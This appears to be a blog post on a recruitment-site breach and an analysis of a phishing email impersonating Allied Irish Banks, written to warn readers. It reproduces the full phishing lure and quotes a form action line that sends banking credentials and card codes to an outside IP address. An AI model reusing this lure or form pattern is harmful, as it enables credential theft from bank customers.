Yesterday the 8th of February the RecruitIreland.com website was compromised. It is believed spammers gained access to the database and compromised names and email addresses for the purposes of spamming.

The website is currently offline as it is not yet  determined how the attack happened. It is believed to be under investigation but in cases like this it is usually down to poor coding.

It is not yet known when the website will come back online.

If you are signed up with RecruitIreland.com you may receive emails similar to the one below which should be ignored. You may also want to think about changing your email password, as like many,  you may have used the same password for your email as you did on recruitireland.com

Once again a spam e-mail message arrives in the inbox. On the surface it appears fairly ordinary. It’s an advertisement for a Viagra or some cheap Chinese knock off watches written in poor English trying to entice me to click onto some website. From time to time I like to investigate further as to how this messaged ended up being sent to my address.

A couple of weeks ago I received an email supposedly from Allied Irish Banks (alert@aib.ie)

Here is a copy of the email I received:

Dear AIB Online User,

We regret to inform you that access to your online account has been locked.

This happened because of too many failed log-in attempts.

To restore your online account access you can:

1. Visit your local branch and complete the Unlock My Account form (takes several days)

2. Complete the Unlock My Account form online, by downloading and completing the attached form (instant)

Quality service and the security of your account are of great importance to us.

We appreciate each opportunity to serve you.

Sincerely,

Customer Service

Attached to this email was a html document containing a form that requested my credentials and each of the one hundred 4 digit codes from my code card. At the top of the form the AIB logo was evident and also familiar buttons exactly the same that appear on the AIB website were included at the bottom as can be seen in the screenshot below.

Taking a look at the source of this form it could be seen that upon entering the details the information would not be sent to AIB but to some other address:

<form action=”http://189.8.16.6/appserv/form1.php” method=”post”

AIB Phishing Scam

Having a closer look at the IP address 189.8.16.6 it turns out that this does not belong to AIB but in fact points to a Unitelco broadband customer in Brazil. What in heavens would would he want all my AIB details for? I then emailed the abuse department of Unitelco informing them that one of their customers connections is involved in a Phishing scam.. To date I have not received a response.

Getting to the end of my investigation, or so I thought I then decided to have a look at the headers of the email and see exactly where that came from.
Received: from toroonXXxXxxX3.sdsl.bell.ca (HELO XXXX.net) ([69.XX.203.XX])
It turned out that this IP address belonged to a Marketing company in Canada.

An nmap of the IP revealed the following:

I promptly contacted the company to let them know that not only are they running an open mail relay on exchange (allowing anyone on the Internet to send e-mail through their server) but also appeared to have a default install of Windows 2003 Server(not a very good idea). To date this appears still not to have been remedied.

So it turned out that the spam email was sent through a poorly secured server in Canada and in the event of it finding someone susceptible enough to actually fill in the details this information would be sent to a computer in Brazil. Luckily I didn’t fall for this one and my account balance has remained in tact…. for now.